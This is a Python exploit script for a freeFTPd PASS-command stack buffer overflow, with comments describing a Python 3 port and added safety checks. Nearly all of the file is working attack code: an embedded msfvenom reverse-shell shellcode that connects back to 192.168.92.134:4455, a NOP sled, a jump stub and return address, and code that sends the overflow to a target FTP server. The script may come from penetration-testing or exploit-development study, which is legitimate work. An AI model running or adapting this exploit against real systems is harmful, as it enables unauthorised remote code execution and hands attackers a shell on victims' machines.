import socket
import sys
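# freeFTPd PASS-command stack overflow (offset per the original script: 801
# bytes of PASS argument reach the saved return address).
#
# Changes versus the original listing:
#   * all protocol/payload data is bytes, so the script runs on Python 3
#     (str-to-sendall raised TypeError there, and "\xbb" would have been
#     UTF-8-encoded as two bytes, corrupting the return address);
#   * the NOP sled length is derived from len(buf) instead of a hard-coded
#     351, and an oversize shellcode is rejected instead of silently
#     producing an empty sled and a misaligned return address;
#   * the socket gets a timeout and is closed in a finally block.

rhost = "192.168.1.100"  # Target RHOST
rport = 21  # Target RPORT
ftpuser = "anonymous"  # FTP username. This account MUST exist and permit anonymous login

# Return address, taken from the Metasploit module, written little-endian
# (0x004014bb). The trailing NUL is the very last byte sent, so any C-string
# truncation it causes cuts nothing the exploit needs.
ret = b"\xbb\x14\x40\x00"

# Stub that sits directly before the return address. Decoded as x86:
#   e9 e3 fc ff ff   jmp rel32 -797  -> back to the start of the shellcode
#   eb f9            jmp short -7    -> onto the rel32 jmp above
#   90 90            padding
# The -797 only lands on buf[0] when shellcode + sled is exactly 792 bytes,
# which the length check below enforces.
stub = b"\xe9\xe3\xfc\xff\xff" + b"\xeb\xf9" + b"\x90\x90"

# Bytes available for shellcode + NOP sled: 801 minus the 9-byte stub.
PAYLOAD_SPACE = 801 - len(stub)

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4455 -f python -b '\x00\x0a\x0d' EXITFUNC=thread
# Payload size: 351 bytes
# NOTE(review): this shellcode connects back to 192.168.92.134:4455 as
# generated. Regenerate it for your own LHOST/LPORT (keep the bad chars
# \x00\x0a\x0d) and have a listener running before sending, otherwise the
# overflow fires but no shell arrives.
buf = b""
buf += b"\xbb\x2f\x19\x1f\x74\xd9\xe5\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\xc5\xe5\xfd"
buf += b"\x81\xe5\xfe\x80\x6a\x15\xff\xe4\xe3\xf0\xce\x24\x97"
buf += b"\x71\x60\x95\xd3\xd7\x8d\x5e\xb1\xc3\x06\x12\x1e\xe4"
buf += b"\xaf\x99\x78\xcb\x30\xb1\xb9\x4a\xb3\xc8\xed\xac\x8a"
buf += b"\x02\xe0\xad\xcb\x7f\x09\xff\x84\xf4\xbc\xef\xa1\x41"
buf += b"\x7d\x84\xfa\x44\x05\x79\x4a\x66\x24\x2c\xc0\x31\xe6"
buf += b"\xcf\x05\x4a\xaf\xd7\x4a\x77\x79\x6c\xb8\x03\x78\xa4"
buf += b"\xf0\xec\xd7\x89\x3c\x1f\x29\xce\xfb\xc0\x5c\x26\xf8"
buf += b"\x7d\x67\xfd\x82\x59\xe2\xe5\x25\x29\x54\xc1\xd4\xfe"
buf += b"\x03\x82\xdb\x4b\x47\xcc\xff\x4a\x84\x67\xfb\xc7\x2b"
buf += b"\xa7\x8d\x9c\x0f\x63\xd5\x47\x31\x32\xb3\x26\x4e\x24"
buf += b"\x1c\x96\xea\x2f\xb1\xc3\x86\x72\xde\x20\xab\x8c\x1e"
buf += b"\x2f\xbc\xff\x2c\xf0\x16\x97\x1c\x79\xb1\x60\x62\x50"
buf += b"\x05\xfe\x9d\x5b\x76\xd7\x59\x0f\x26\x4f\x4b\x30\xad"
buf += b"\x8f\x74\xe5\x62\xdf\xda\x56\xc3\x8f\x9a\x06\xab\xc5"
buf += b"\x14\x78\xcb\xe6\xfe\x11\x66\x1d\x69\xde\xdf\x1c\x7c"
buf += b"\xb6\x1d\x1e\x7f\xfd\xab\xf8\x15\x11\xfa\x53\x82\x88"
buf += b"\xa7\x2f\x33\x54\x72\x4a\x73\xde\x71\xab\x3a\x17\xff"
buf += b"\xbf\xab\xd7\x4a\x9d\x7a\xe7\x60\x89\xe1\x7a\xef\x49"
buf += b"\x6f\x67\xb8\x1e\x38\x59\xb1\xca\xd4\xc0\x6b\xe8\x24"
buf += b"\x94\x54\xa8\xf2\x65\x5a\x31\x76\xd1\x78\x21\x4e\xda"
buf += b"\xc4\x15\x1e\x8d\x92\xc3\xd8\x67\x55\xbd\xb2\xd4\x3f"
buf += b"\x29\x42\x17\x80\x2f\x4b\x72\x76\xcf\xfa\x2b\xcf\xf0"
buf += b"\x33\xbc\xc7\x89\x29\x5c\x27\x40\xea\x6c\x62\xc8\x5b"
buf += b"\xe5\x2b\x99\xd9\x68\xcc\x74\x1d\x95\x4f\x7c\xde\x62"
buf += b"\x4f\xf5\xdb\x2f\xd7\xe6\x91\x20\xb2\x08\x05\x40\x97"

# A shellcode larger than the available space would make the multiplication
# below yield an empty sled and shift the stub/ret off their offsets, so
# fail loudly instead of sending a broken buffer.
if len(buf) > PAYLOAD_SPACE:
    raise SystemExit(
        "shellcode is %d bytes but only %d fit before the return address"
        % (len(buf), PAYLOAD_SPACE)
    )

# NOP sled fills whatever the shellcode leaves of the 792 bytes.
nop = b"\x90" * (PAYLOAD_SPACE - len(buf))

exploit = buf + nop + stub + ret
password = b"PASS " + exploit + b"\r\n"

if __name__ == "__main__":
    # Timeout so a dead or firewalled target does not hang recv() forever.
    client = socket.create_connection((rhost, rport), timeout=10)
    try:
        client.recv(1024)  # banner
        client.sendall(b"USER " + ftpuser.encode("ascii") + b"\r\n")  # Login with FTP creds
        client.recv(1024)  # reply to USER
        client.sendall(password)  # Send buffer overflow
    finally:
        client.close()
    print("\nDone!")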